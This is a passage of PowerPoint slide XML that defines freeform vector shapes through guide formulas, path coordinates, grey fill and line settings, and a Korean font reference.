                      <a:gd name="T51" fmla="*/ 1061 h 1147"/>
                      <a:gd name="T52" fmla="*/ 169 w 703"/>
                      <a:gd name="T53" fmla="*/ 1050 h 1147"/>
                      <a:gd name="T54" fmla="*/ 132 w 703"/>
                      <a:gd name="T55" fmla="*/ 1014 h 1147"/>
                      <a:gd name="T56" fmla="*/ 97 w 703"/>
                      <a:gd name="T57" fmla="*/ 965 h 1147"/>
                      <a:gd name="T58" fmla="*/ 71 w 703"/>
                      <a:gd name="T59" fmla="*/ 910 h 1147"/>
                      <a:gd name="T60" fmla="*/ 49 w 703"/>
                      <a:gd name="T61" fmla="*/ 852 h 1147"/>
                      <a:gd name="T62" fmla="*/ 29 w 703"/>
                      <a:gd name="T63" fmla="*/ 784 h 1147"/>
                      <a:gd name="T64" fmla="*/ 17 w 703"/>
                      <a:gd name="T65" fmla="*/ 718 h 1147"/>
                      <a:gd name="T66" fmla="*/ 3 w 703"/>
                      <a:gd name="T67" fmla="*/ 612 h 1147"/>
                      <a:gd name="T68" fmla="*/ 12 w 703"/>
                      <a:gd name="T69" fmla="*/ 541 h 1147"/>
                      <a:gd name="T70" fmla="*/ 26 w 703"/>
                      <a:gd name="T71" fmla="*/ 483 h 1147"/>
                      <a:gd name="T72" fmla="*/ 40 w 703"/>
                      <a:gd name="T73" fmla="*/ 431 h 1147"/>
                      <a:gd name="T74" fmla="*/ 57 w 703"/>
                      <a:gd name="T75" fmla="*/ 384 h 1147"/>
                      <a:gd name="T76" fmla="*/ 117 w 703"/>
                      <a:gd name="T77" fmla="*/ 299 h 1147"/>
                      <a:gd name="T78" fmla="*/ 186 w 703"/>
                      <a:gd name="T79" fmla="*/ 203 h 1147"/>
                      <a:gd name="T80" fmla="*/ 232 w 703"/>
                      <a:gd name="T81" fmla="*/ 137 h 1147"/>
                      <a:gd name="T82" fmla="*/ 271 w 703"/>
                      <a:gd name="T83" fmla="*/ 85 h 1147"/>
                      <a:gd name="T84" fmla="*/ 317 w 703"/>
                      <a:gd name="T85" fmla="*/ 44 h 1147"/>
                      <a:gd name="T86" fmla="*/ 362 w 703"/>
                      <a:gd name="T87" fmla="*/ 7 h 1147"/>
                      <a:gd name="T88" fmla="*/ 394 w 703"/>
                      <a:gd name="T89" fmla="*/ 29 h 1147"/>
                      <a:gd name="T90" fmla="*/ 425 w 703"/>
                      <a:gd name="T91" fmla="*/ 70 h 1147"/>
                      <a:gd name="T92" fmla="*/ 457 w 703"/>
                      <a:gd name="T93" fmla="*/ 122 h 1147"/>
                      <a:gd name="T94" fmla="*/ 488 w 703"/>
                      <a:gd name="T95" fmla="*/ 181 h 1147"/>
                      <a:gd name="T96" fmla="*/ 502 w 703"/>
                      <a:gd name="T97" fmla="*/ 213 h 1147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703"/>
                      <a:gd name="T148" fmla="*/ 0 h 1147"/>
                      <a:gd name="T149" fmla="*/ 703 w 703"/>
                      <a:gd name="T150" fmla="*/ 1147 h 1147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703" h="1147">
                        <a:moveTo>
                          <a:pt x="506" y="218"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="508" y="243"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="514" y="269"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="519" y="294"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="523" y="321"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="525" y="350"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="528" y="380"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="531" y="406"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="533" y="435"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="533" y="472"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="536" y="512"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="536" y="549"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="536" y="586"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="533" y="615"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="531" y="649"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="531" y="678"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="528" y="711"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="531" y="733"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="531" y="752"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="533" y="774"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="533" y="793"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="536" y="803"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="536" y="815"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="540" y="822"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="542" y="830"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="545" y="837"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="548" y="837"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="551" y="844"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="553" y="847"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="560" y="852"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="562" y="855"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="568" y="859"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="570" y="859"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="577" y="866"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="579" y="866"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="585" y="869"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="588" y="874"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="594" y="874"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="599" y="869"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="605" y="869"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="611" y="866"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="622" y="877"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="631" y="884"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="643" y="896"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="656" y="903"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="668" y="914"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="679" y="921"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="690" y="928"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="702" y="940"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="699" y="955"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="699" y="969"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="697" y="984"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="694" y="1002"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="690" y="1009"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="688" y="1017"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="682" y="1028"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="679" y="1039"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="673" y="1043"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="670" y="1050"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="665" y="1058"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="660" y="1061"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="656" y="1068"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="651" y="1076"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="648" y="1083"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="643" y="1090"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="634" y="1098"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="625" y="1102"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="619" y="1112"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="611" y="1121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="602" y="1127"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="594" y="1134"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="585" y="1139"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="579" y="1146"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="577" y="1146"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="574" y="1146"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="570" y="1146"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="568" y="1146"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="553" y="1143"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="542" y="1139"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="531" y="1134"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="519" y="1131"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="508" y="1127"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="494" y="1124"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="482" y="1121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="471" y="1117"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="460" y="1112"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="1109"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="437" y="1105"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="425" y="1102"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="411" y="1098"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="399" y="1094"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="388" y="1090"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="377" y="1087"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="365" y="1083"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="348" y="1080"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="337" y="1080"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="320" y="1076"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="308" y="1076"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="294" y="1072"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="279" y="1072"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="266" y="1068"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="254" y="1065"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="1061"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="225" y="1061"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="211" y="1058"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="197" y="1058"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="186" y="1053"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="169" y="1050"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="157" y="1050"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="149" y="1039"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="140" y="1024"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="132" y="1014"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="123" y="1002"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="114" y="991"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="105" y="980"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="97" y="965"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="91" y="958"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="83" y="943"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="77" y="925"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="71" y="910"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="66" y="896"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="60" y="881"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="54" y="866"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="49" y="852"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="43" y="837"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="37" y="822"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="34" y="803"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="29" y="784"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="26" y="771"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="23" y="752"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="20" y="733"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="17" y="718"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12" y="700"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="9" y="674"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="5" y="645"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3" y="612"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="586"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3" y="568"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="9" y="556"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12" y="541"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="14" y="527"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="17" y="512"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="23" y="497"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="26" y="483"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="29" y="468"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="32" y="457"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="37" y="446"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="40" y="431"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="46" y="421"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="51" y="409"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="54" y="394"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="57" y="384"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="63" y="372"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="80" y="346"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="100" y="324"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="117" y="299"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="134" y="277"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="151" y="250"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="169" y="228"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="186" y="203"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="203" y="181"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="214" y="166"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="223" y="151"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="232" y="137"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="242" y="125"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="254" y="110"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="262" y="96"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="271" y="85"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="283" y="70"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="294" y="63"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="303" y="52"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="317" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="328" y="37"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="340" y="25"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="351" y="19"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="362" y="7"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="374" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="379" y="7"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="388" y="19"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="394" y="29"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="403" y="41"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="408" y="52"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="416" y="59"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="425" y="70"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="431" y="81"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="440" y="96"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="107"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="457" y="122"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="465" y="137"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="471" y="151"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="479" y="166"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="488" y="181"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="497" y="196"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="499" y="203"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="502" y="210"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="502" y="213"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="506" y="218"/>
                        </a:lnTo>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="C0C0C0"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="rnd" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="80808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ko-KR" altLang="en-US">
                      <a:latin typeface="HY헤드라인M" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                      <a:ea typeface="HY헤드라인M" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="34" name="Freeform 60"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2274" y="3177"/>
                  <a:ext cx="518" cy="851"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 436 w 706"/>
                    <a:gd name="T1" fmla="*/ 80 h 1158"/>
                    <a:gd name="T2" fmla="*/ 362 w 706"/>
                    <a:gd name="T3" fmla="*/ 164 h 1158"/>
                    <a:gd name="T4" fmla="*/ 266 w 706"/>
                    <a:gd name="T5" fmla="*/ 298 h 1158"/>
                    <a:gd name="T6" fmla="*/ 184 w 706"/>
                    <a:gd name="T7" fmla="*/ 429 h 1158"/>
                    <a:gd name="T8" fmla="*/ 136 w 706"/>
                    <a:gd name="T9" fmla="*/ 586 h 1158"/>
                    <a:gd name="T10" fmla="*/ 65 w 706"/>
                    <a:gd name="T11" fmla="*/ 896 h 1158"/>
                    <a:gd name="T12" fmla="*/ 25 w 706"/>
                    <a:gd name="T13" fmla="*/ 1070 h 1158"/>
                    <a:gd name="T14" fmla="*/ 65 w 706"/>
                    <a:gd name="T15" fmla="*/ 1157 h 1158"/>
                    <a:gd name="T16" fmla="*/ 221 w 706"/>
                    <a:gd name="T17" fmla="*/ 1157 h 1158"/>
                    <a:gd name="T18" fmla="*/ 374 w 706"/>
                    <a:gd name="T19" fmla="*/ 1157 h 1158"/>
                    <a:gd name="T20" fmla="*/ 530 w 706"/>
                    <a:gd name="T21" fmla="*/ 1157 h 1158"/>
                    <a:gd name="T22" fmla="*/ 683 w 706"/>
                    <a:gd name="T23" fmla="*/ 1157 h 1158"/>
                    <a:gd name="T24" fmla="*/ 671 w 706"/>
                    <a:gd name="T25" fmla="*/ 1128 h 1158"/>
                    <a:gd name="T26" fmla="*/ 666 w 706"/>
                    <a:gd name="T27" fmla="*/ 1073 h 1158"/>
                    <a:gd name="T28" fmla="*/ 668 w 706"/>
                    <a:gd name="T29" fmla="*/ 1052 h 1158"/>
                    <a:gd name="T30" fmla="*/ 634 w 706"/>
                    <a:gd name="T31" fmla="*/ 1085 h 1158"/>
                    <a:gd name="T32" fmla="*/ 595 w 706"/>
                    <a:gd name="T33" fmla="*/ 1066 h 1158"/>
                    <a:gd name="T34" fmla="*/ 561 w 706"/>
                    <a:gd name="T35" fmla="*/ 986 h 1158"/>
                    <a:gd name="T36" fmla="*/ 523 w 706"/>
                    <a:gd name="T37" fmla="*/ 859 h 1158"/>
                    <a:gd name="T38" fmla="*/ 506 w 706"/>
                    <a:gd name="T39" fmla="*/ 917 h 1158"/>
                    <a:gd name="T40" fmla="*/ 470 w 706"/>
                    <a:gd name="T41" fmla="*/ 826 h 1158"/>
                    <a:gd name="T42" fmla="*/ 445 w 706"/>
                    <a:gd name="T43" fmla="*/ 698 h 1158"/>
                    <a:gd name="T44" fmla="*/ 422 w 706"/>
                    <a:gd name="T45" fmla="*/ 495 h 1158"/>
                    <a:gd name="T46" fmla="*/ 382 w 706"/>
                    <a:gd name="T47" fmla="*/ 440 h 1158"/>
                    <a:gd name="T48" fmla="*/ 357 w 706"/>
                    <a:gd name="T49" fmla="*/ 608 h 1158"/>
                    <a:gd name="T50" fmla="*/ 340 w 706"/>
                    <a:gd name="T51" fmla="*/ 429 h 1158"/>
                    <a:gd name="T52" fmla="*/ 345 w 706"/>
                    <a:gd name="T53" fmla="*/ 611 h 1158"/>
                    <a:gd name="T54" fmla="*/ 379 w 706"/>
                    <a:gd name="T55" fmla="*/ 779 h 1158"/>
                    <a:gd name="T56" fmla="*/ 436 w 706"/>
                    <a:gd name="T57" fmla="*/ 924 h 1158"/>
                    <a:gd name="T58" fmla="*/ 484 w 706"/>
                    <a:gd name="T59" fmla="*/ 1026 h 1158"/>
                    <a:gd name="T60" fmla="*/ 513 w 706"/>
                    <a:gd name="T61" fmla="*/ 1023 h 1158"/>
                    <a:gd name="T62" fmla="*/ 535 w 706"/>
                    <a:gd name="T63" fmla="*/ 1026 h 1158"/>
                    <a:gd name="T64" fmla="*/ 561 w 706"/>
                    <a:gd name="T65" fmla="*/ 1088 h 1158"/>
                    <a:gd name="T66" fmla="*/ 523 w 706"/>
                    <a:gd name="T67" fmla="*/ 1055 h 1158"/>
                    <a:gd name="T68" fmla="*/ 481 w 706"/>
                    <a:gd name="T69" fmla="*/ 1063 h 1158"/>
                    <a:gd name="T70" fmla="*/ 433 w 706"/>
                    <a:gd name="T71" fmla="*/ 1055 h 1158"/>
                    <a:gd name="T72" fmla="*/ 362 w 706"/>
                    <a:gd name="T73" fmla="*/ 1030 h 1158"/>
                    <a:gd name="T74" fmla="*/ 334 w 706"/>
                    <a:gd name="T75" fmla="*/ 1030 h 1158"/>
                    <a:gd name="T76" fmla="*/ 292 w 706"/>
                    <a:gd name="T77" fmla="*/ 1018 h 1158"/>
                    <a:gd name="T78" fmla="*/ 246 w 706"/>
                    <a:gd name="T79" fmla="*/ 949 h 1158"/>
                    <a:gd name="T80" fmla="*/ 201 w 706"/>
                    <a:gd name="T81" fmla="*/ 855 h 1158"/>
                    <a:gd name="T82" fmla="*/ 158 w 706"/>
                    <a:gd name="T83" fmla="*/ 685 h 1158"/>
                    <a:gd name="T84" fmla="*/ 165 w 706"/>
                    <a:gd name="T85" fmla="*/ 527 h 1158"/>
                    <a:gd name="T86" fmla="*/ 192 w 706"/>
                    <a:gd name="T87" fmla="*/ 440 h 1158"/>
                    <a:gd name="T88" fmla="*/ 221 w 706"/>
                    <a:gd name="T89" fmla="*/ 385 h 1158"/>
                    <a:gd name="T90" fmla="*/ 263 w 706"/>
                    <a:gd name="T91" fmla="*/ 320 h 1158"/>
                    <a:gd name="T92" fmla="*/ 317 w 706"/>
                    <a:gd name="T93" fmla="*/ 244 h 1158"/>
                    <a:gd name="T94" fmla="*/ 368 w 706"/>
                    <a:gd name="T95" fmla="*/ 167 h 1158"/>
                    <a:gd name="T96" fmla="*/ 425 w 706"/>
                    <a:gd name="T97" fmla="*/ 109 h 1158"/>
                    <a:gd name="T98" fmla="*/ 470 w 706"/>
                    <a:gd name="T99" fmla="*/ 112 h 1158"/>
                    <a:gd name="T100" fmla="*/ 504 w 706"/>
                    <a:gd name="T101" fmla="*/ 134 h 1158"/>
                    <a:gd name="T102" fmla="*/ 513 w 706"/>
                    <a:gd name="T103" fmla="*/ 139 h 1158"/>
                    <a:gd name="T104" fmla="*/ 484 w 706"/>
                    <a:gd name="T105" fmla="*/ 102 h 1158"/>
                    <a:gd name="T106" fmla="*/ 456 w 706"/>
                    <a:gd name="T107" fmla="*/ 80 h 1158"/>
                    <a:gd name="T108" fmla="*/ 496 w 706"/>
                    <a:gd name="T109" fmla="*/ 50 h 1158"/>
                    <a:gd name="T110" fmla="*/ 527 w 706"/>
                    <a:gd name="T111" fmla="*/ 58 h 1158"/>
                    <a:gd name="T112" fmla="*/ 564 w 706"/>
                    <a:gd name="T113" fmla="*/ 109 h 1158"/>
                    <a:gd name="T114" fmla="*/ 603 w 706"/>
                    <a:gd name="T115" fmla="*/ 182 h 1158"/>
                    <a:gd name="T116" fmla="*/ 569 w 706"/>
                    <a:gd name="T117" fmla="*/ 105 h 1158"/>
                    <a:gd name="T118" fmla="*/ 538 w 706"/>
                    <a:gd name="T119" fmla="*/ 55 h 1158"/>
                    <a:gd name="T120" fmla="*/ 547 w 706"/>
                    <a:gd name="T121" fmla="*/ 0 h 1158"/>
                    <a:gd name="T122" fmla="*/ 521 w 706"/>
                    <a:gd name="T123" fmla="*/ 15 h 1158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706"/>
                    <a:gd name="T187" fmla="*/ 0 h 1158"/>
                    <a:gd name="T188" fmla="*/ 706 w 706"/>
                    <a:gd name="T189" fmla="*/ 1158 h 1158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706" h="1158">
                      <a:moveTo>
                        <a:pt x="510" y="25"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="496" y="33"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="484" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="472" y="50"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="447" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="80"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="425" y="87"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="411" y="94"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="402" y="109"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="124"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="382" y="139"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="374" y="153"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="362" y="164"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="354" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="343" y="193"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="334" y="208"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="317" y="229"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="300" y="251"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="273"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="266" y="298"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="249" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="235" y="342"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="218" y="367"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="201" y="390"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="195" y="404"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="190" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="429"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="178" y="440"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="455"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="167" y="466"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="161" y="480"/>
                      </a:lnTo>
                      <a:lnTo>
